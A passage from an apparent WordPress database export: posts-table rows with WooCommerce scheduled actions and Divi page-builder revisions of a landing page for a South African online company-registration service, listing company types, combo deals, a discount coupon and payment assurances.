custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 10:44:41','2019-08-08 08:44:41','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32409,0,'2019-08-08 11:39:39','2019-08-08 11:39:39','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4c0a0298f1e0.25062601-CE5SvPvKEU052gWvsO0NzYmj3krZr924','','','2019-08-08 13:39:46','2019-08-08 11:39:46','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32409',0,'scheduled-action','',3),(32410,0,'2019-08-08 11:39:39','2019-08-08 11:39:39','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4c0a02a4c147.15180841-jm3b4OYwFgOu9Mi3MtXCrlKkhrIgBCBF','','','2019-08-08 13:39:46','2019-08-08 11:39:46','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32410',0,'scheduled-action','',3),(32411,0,'2019-08-08 12:39:46','2019-08-08 12:39:46','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4c184d72b755.02191501-8ywh9LtIqXP3p44qPlNm2dh6xLakBeIN','','','2019-08-08 14:40:45','2019-08-08 12:40:45','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32411',0,'scheduled-action','',3),(32412,0,'2019-08-08 12:39:46','2019-08-08 12:39:46','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4c184d874a79.15485638-PXvfBnt0GI2qz1kkXMpGnS2cAbOVHmfy','','','2019-08-08 14:40:45','2019-08-08 12:40:45','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32412',0,'scheduled-action','',3),(32414,1,'2019-08-08 14:03:52','2019-08-08 12:03:52','','Auto Draft','','inherit','closed','closed','','32346-revision-v1','','','2019-08-08 14:03:52','2019-08-08 12:03:52','',32346,'https://companyregistration.online/32346-revision-v1/',0,'revision','',0),(32415,0,'2019-08-08 13:40:45','2019-08-08 13:40:45','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4c269aea6fc0.47068022-RCsg1H6N1Z9FJM14uMAy85NVkeGr7HfD','','','2019-08-08 15:41:46','2019-08-08 13:41:46','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32415',0,'scheduled-action','',3),(32416,0,'2019-08-08 13:40:45','2019-08-08 13:40:45','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4c269b138db7.79179069-MZjewKU5Wrq00kIgBwchCZr55L8WDAH2','','','2019-08-08 15:41:47','2019-08-08 13:41:47','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32416',0,'scheduled-action','',3),(32418,3,'2019-08-08 15:09:37','2019-08-08 13:09:37','[et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||0px|||\" custom_padding=\"10px|5px|51px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"-12px||-13px|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"-24px||-13px|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||-6px|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.6\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 15:09:37','2019-08-08 13:09:37','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32401,3,'2019-08-08 10:55:42','2019-08-08 08:55:42','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm 